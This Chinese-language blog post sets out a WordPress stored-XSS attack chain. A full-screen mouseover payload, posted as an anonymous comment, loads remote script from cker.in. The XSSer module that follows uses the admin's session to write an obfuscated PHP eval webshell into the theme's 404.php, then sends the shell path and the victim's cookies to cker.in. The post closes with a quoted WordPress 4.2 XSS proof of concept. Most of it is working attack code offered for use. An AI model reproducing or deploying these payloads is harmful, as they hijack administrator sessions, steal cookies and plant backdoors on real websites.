完美payload

<abbr title="qweqw style=display:block;width:9900px;position:absolute;height:9900px;top:-100px;left:-100px; onmouseover=eval(unescape(/with%28document%290%5Bbody.appendChild%28createElement%28%27script%27%29%29.src%3D%27%2f%2fcker.in%2f2oPaSh%27%5D/.source))// ">

(由于博客程序处理,截断效果的此实体字符显示不出来,&#8220; ,https://cedricvb.be/post/wordpress-stored-xss-vulnerability-4-1-2/

 

匿名评论后前台触发,覆盖率全屏窗口

 

添加Xsser平台模块的接收参数:shell,用来接收getshell地址

clip_image001[1]

 

xsser平台模块代码(Ajax Getshell)

var xmlHttp;var content404,theme,_wpnonce,content ;

function createXMLHttpRequest() {

if (window.ActiveXObject) {

xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");

}

else if (window.XMLHttpRequest) {

xmlHttp = new XMLHttpRequest();

}

}

function doRequest(url) {

createXMLHttpRequest();

xmlHttp.onreadystatechange = handleStateChange;

xmlHttp.open("GET", url, true);

xmlHttp.send(null);

}

function handleStateChange() {

if(xmlHttp.readyState == 4) {

//alert(xmlHttp.responseText)

content404 = xmlHttp.responseText;

theme = new RegExp("<input type=\"hidden\" name=\"theme\" value=\"(.+?)\" />").exec(content404)[1]

_wpnonce = new RegExp("<input type=\"hidden\" id=\"_wpnonce\" name=\"_wpnonce\" value=\"(.+?)\" />").exec(content404)[1]

content = new RegExp("(:?aria-describedby=\"newcontent-description\">)([^<]+)").exec(content404)[2]+"<script language=\"php\">fputs(fopen(chr(46).chr(47).chr(65).chr(46).chr(112).chr(104).chr(112),w),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(97).chr(65).chr(93).chr(41).chr(59).chr(63).chr(62));</script>"

//Post code

var data = "_wpnonce="+_wpnonce+"&_wp_http_referer="+window.location.pathname+"&newcontent="+escape(content)+"&action=update&file=404.php&theme="+theme+"&scrollto=10&docs-list=&submit=submit"

doPostRequest("./wp-admin/theme-editor.php",data)

}

}

doRequest("./wp-admin/theme-editor.php?file=404.php")

function doPostRequest(url,data) {

createXMLHttpRequest();

xmlHttp.onreadystatechange = handleStateChangePost;

xmlHttp.open("POST", url, true);

xmlHttp.send(data);

}

function handleStateChangePost() {

if(xmlHttp.readyState == 4) {

//get 404

doRequest2("./index.php?p=9999999999999998888")

}

}

function doRequest2(url) {

createXMLHttpRequest();

xmlHttp.onreadystatechange = handleStateChange3;

xmlHttp.open("GET", url, true);

xmlHttp.send(null);

}

function handleStateChange3()

{

if(xmlHttp.readyState == 4) {

//(function(){(new Image).src="http://cker.in/index.php?do=api&id={projectId}&shell="+document.location.origin+document.location.pathname+"./A.php AAA"}())

//(function(){(new Image).src='http://cker.in/index.php?do=api&id={projectId}&shell='+escape(document.location.origin+document.location.pathname+'./A.php') })()

(function(){(new Image).src='http://cker.in/index.php?do=api&id={projectId}&shell='+escape(document.location.origin+document.location.pathname+'./A.php')+'&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})())})()

}

}

 

 

关于WordPress 4.2 Stored Xss

http://klikki.fi/adv/wordpress2.html

Proof of Concept

Enter as a comment text:

<a title='x onmouseover=alert(unescape(/hello%20world/.source)) style=position:absolute;left:0;top:0;width:5000px;height:5000px AAAAAAAAAAAA...[64 kb]..AAA'></a>

源链接

Hacking more

...